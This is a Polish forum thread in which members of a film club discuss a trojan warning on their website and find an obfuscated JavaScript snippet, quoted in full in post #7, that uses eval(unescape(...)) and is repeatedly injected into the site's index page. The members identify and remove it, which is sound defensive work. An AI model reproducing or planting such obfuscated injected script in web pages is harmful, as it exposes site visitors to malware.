Trojan przy wejściu na strone.
#1
Od pół miesiąca kiedy wchodzę na stronę kmf.fc.pl wyskakuje mi druga strona i kasperski łapie trojana. Czy poprawicie to wreszcie?

Odpowiedz
#2
U mnie nic takiego nie ma. Może dlatego że nie pomaga mi idiota kasperski :wink:

Odpowiedz
#3
Co prawda, na komputerze, którego teraz używam też mam Kaspera i nic nic pluje, ale na końcu źródłą strony widać jakiś podejrzany kod javascript...

Zajmiemy się tym.

Odpowiedz
#4
Moj antyvirus / firewall / firefox / whatever :) nie pokazuje nic.

"Podejrzany" kod javascript, o ktorym pisze Gonzo, to tak naprawde kod do zliczania odwiedzin - Google Analytics... Potrzebny do statystyki. Rzecz jak najbardziej czysta :)

Na stronie nie ma zadnego trojana / robaka / wirusa. Wina lezy po stronie Kaspierskiego albo jego ustawien.
A L () E E N

Odpowiedz
#5
Jesteś pewien co tego kodu (może sam go umieszczałeś?)?

Bo mi on na kod GA nie wygląda....

Zresztą wpisałem fragment w Googla i w wynikach raczej była mowa o czym innym.

Odpowiedz
#6
To jest kod GA.

Gonzo, pewnie zmylił cię ten fragment kodu:
Kod:
google-analytics.com/ga.js
:wink:

Odpowiedz
#7
Mówię o kmf.fc.pl a nie film.org.pl

a chodzi o kod:
Kod:
<script language="javascript">$="%64b%3d%22%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%37%3d%27 +%65sc%61%70%65(v%29+%27;e%78p%69%72es%3d%27+e%78d.%74o%47MTS%74ri%6e%67%28);}%3b";eval(unescape($));document.write($);</script></body></html>

Odpowiedz
#8
Fuj, faktycznie.

Odpowiedz
#9
Moj blad, zle spojrzalem - myslalem, ze chodzi o strone film.org.pl, nie kmf.org.pl...

Oczywiscie ten caly fragment z index.html na kmf.org.pl nalezy jak najszybciej wywalic - to faktycznie jakis syf jest, ktory co jakis czas wbija sie na indexowe strony :/ Teraz jestem w pracy i nie moge tego zrobic, zatem prosba do kogos z KMF, kto ma dostep do serwera kmf.org.pl - sciagnijcie index.html, wywalcie ten szajs i zastapcie index na serwerze :)
A L () E E N

Odpowiedz
#10
No proszę państwa, ja KMF-owi donosiłem o tym jakiś czas temu... ;>
Klub OFILMIE | Podcast filmowy Radio Ofilmie

Odpowiedz
#11
Najsmieszniejsze jest to, ze nie wiadomo skad ten syf w pliku index.html na kmf.org.pl sie bierze... Najprostszym wytlumaczeniem byloby, ze ktos ma robala w komputerze i jak edytuje ten index, to wbija se syfiasty kod. Ale indexu na kmf.org.pl NIKT nie rusza od lat - to stala strona, na ktorej NIC sie nie aktualizuje, wiec nie mam pojecia, skad ten syf sie tam bierze (nota bene regularnie go usuwam, co jakis czas...).
A L () E E N

Odpowiedz

Digg   Delicious   Reddit   Facebook   Twitter   StumbleUpon  






Podobne wątki
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Potrzebujemy pomocy przy obróbkach HTML DUX 1 2,306 11-09-2009, 09:56
Ostatni post: DUX



Użytkownicy przeglądający ten wątek:
1 gości